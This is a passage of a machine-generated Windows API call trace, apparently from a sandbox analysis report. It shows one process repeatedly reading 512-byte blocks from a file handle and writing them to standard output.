lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.879] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.879] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0140.879] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] GetFileType (hFile=0x4c) returned 0x1 [0140.879] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.879] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] 
GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.880] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.880] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.880] GetFileType (hFile=0x4c) returned 0x1 [0140.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | 
out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, 
lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.881] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.881] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.881] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.882] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) 
returned 1 [0140.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.882] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.882] GetFileType (hFile=0x4c) returned 0x1 [0140.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] GetFileType (hFile=0x4c) returned 0x1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.883] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.883] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, 
lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] GetFileType (hFile=0x4c) returned 0x1 [0140.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.884] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.884] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.884] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed28*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ed78*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] GetFileType (hFile=0x4c) returned 0x1 [0140.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.885] WriteFile (in: hFile=0x4c, lpBuffer=0x28edc8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28edc8*, lpNumberOfBytesWritten=0x28ddcc*=0x20, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x28ddb8 | out: lpNewFilePointer=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.886] ReadFile (in: hFile=0x54, lpBuffer=0x28ebe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28ddd8, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesRead=0x28ddd8*=0x200, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ebe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ebe8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec38*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ec88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ec88*, lpNumberOfBytesWritten=0x28ddcc*=0x50, lpOverlapped=0x0) returned 1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] GetFileType (hFile=0x4c) returned 0x1 [0140.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.886] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28ddcc, lpOverlapped=0x0 | out: lpBuffer=0x28ecd8*, lpNumberOfBytesWritten=0x28ddcc*=0x50, 
